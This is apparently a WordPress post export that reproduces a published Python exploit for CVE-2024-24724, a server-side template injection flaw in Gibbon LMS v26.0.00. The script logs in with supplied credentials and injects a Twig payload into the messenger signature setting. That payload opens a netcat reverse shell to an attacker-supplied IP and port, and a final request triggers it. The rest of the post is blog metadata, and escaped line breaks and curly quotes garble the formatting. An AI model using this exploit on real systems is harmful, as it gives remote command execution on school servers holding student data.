# Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version
\n# Date: 21.01.2024
\n# Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli)
\n# Vendor Homepage: https:\/\/gibbonedu.org\/
\n# Software Link: https:\/\/github.com\/GibbonEdu\/core
\n# Version: v26.0.00
\n# Tested on: Ubuntu 22.0
\n# CVE : CVE-2024-24724
\nimport requests
\nimport re
\nimport sys<\/p>\n
def login(target_host, target_port,email,password):
\nurl = f’http:\/\/{target_host}:{target_port}\/login.php?timeout=true’
\nheaders = {“Content-Type”: “multipart\/form-data; boundary=—————————174475955731268836341556039466″}
\ndata = f”—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”address\\”\\r\\n\\r\\n\\r\\n—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”method\\”\\r\\n\\r\\ndefault\\r\\n—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”username\\”\\r\\n\\r\\n{email}\\r\\n—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”password\\”\\r\\n\\r\\n{password}\\r\\n—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”gibbonSchoolYearID\\”\\r\\n\\r\\n025\\r\\n—————————–174475955731268836341556039466\\r\\nContent-Disposition: form-data; name=\\”gibboni18nID\\”\\r\\n\\r\\n0002\\r\\n—————————–174475955731268836341556039466–\\r\\n”
\nr = requests.post(url, headers=headers, data=data, allow_redirects=False)
\nSession_Cookie = re.split(r”\\s+”, r.headers[‘Set-Cookie’])
\nif Session_Cookie[4] is not None and ‘\/index.php’ in str(r.headers[‘Location’]):
\nprint(“login successful!”)<\/p>\n
return Session_Cookie[4]\n
def rce(cookie, target_host, target_port, attacker_ip, attacker_port):
\nurl = f’http:\/\/{target_host}:{target_port}\/modules\/School%20Admin\/messengerSettingsProcess.php’
\nheaders = {“Content-Type”: “multipart\/form-data; boundary=—————————67142646631840027692410521651”, “Cookie”: cookie}
\ndata = f”—————————–67142646631840027692410521651\\r\\nContent-Disposition: form-data; name=\\”address\\”\\r\\n\\r\\n\/modules\/School Admin\/messengerSettings.php\\r\\n—————————–67142646631840027692410521651\\r\\nContent-Disposition: form-data; name=\\”enableHomeScreenWidget\\”\\r\\n\\r\\nY\\r\\n—————————–67142646631840027692410521651\\r\\nContent-Disposition: form-data; name=\\”signatureTemplate\\”\\r\\n\\r\\n{{{{[\\’rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|sh -i 2>&1|nc {attacker_ip} {attacker_port} >\/tmp\/f’]|filter(‘system’)}}}}\\r\\n—————————–67142646631840027692410521651\\r\\nContent-Disposition: form-data; name=\\”messageBcc\\”\\r\\n\\r\\n\\r\\n—————————–67142646631840027692410521651\\r\\nContent-Disposition: form-data; name=\\”pinnedMessagesOnHome\\”\\r\\n\\r\\nN\\r\\n—————————–67142646631840027692410521651–\\r\\n”
\nr = requests.post(url, headers=headers, data=data, allow_redirects=False)
\nif ‘success0’ in str(r.headers[‘Location’]):
\nprint(“Payload uploaded successfully!”)<\/p>\n
def trigger(cookie, target_host, target_port):
\nurl = f’http:\/\/{target_host}:{target_port}\/index.php?q=\/modules\/School%20Admin\/messengerSettings.php&return=success0′
\nheaders = {“Cookie”: cookie}
\nprint(“RCE successful!”)
\nr = requests.get(url, headers=headers, allow_redirects=False)<\/p>\n
if __name__ == ‘__main__’:
\nif len(sys.argv) != 7:
\nprint(“Usage: script.py <target_host> <target_port> <attacker_ip> <attacker_port> <email> <password>”)
\nsys.exit(1)
\ncookie = login(sys.argv[1], sys.argv[2],sys.argv[5],sys.argv[6])
\nrce(cookie, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])
\ntrigger(cookie, sys.argv[1], sys.argv[2])<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Gibbon LMS has an SSTI vulnerability on the v26.0.00 version # Date: 21.01.2024 # Exploit Author: SecondX.io Research Team(Islam Rzayev,Fikrat Guliev, Ali Maharramli) # Vendor Homepage: https:\/\/gibbonedu.org\/ # Software Link: https:\/\/github.com\/GibbonEdu\/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24724 import requests import re import sys def login(target_host, target_port,email,password): …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55766","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55766","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55766"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55766\/revisions"}],"predecessor-version":[{"id":55777,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55766\/revisions\/55777"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55766"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55766"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55766"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}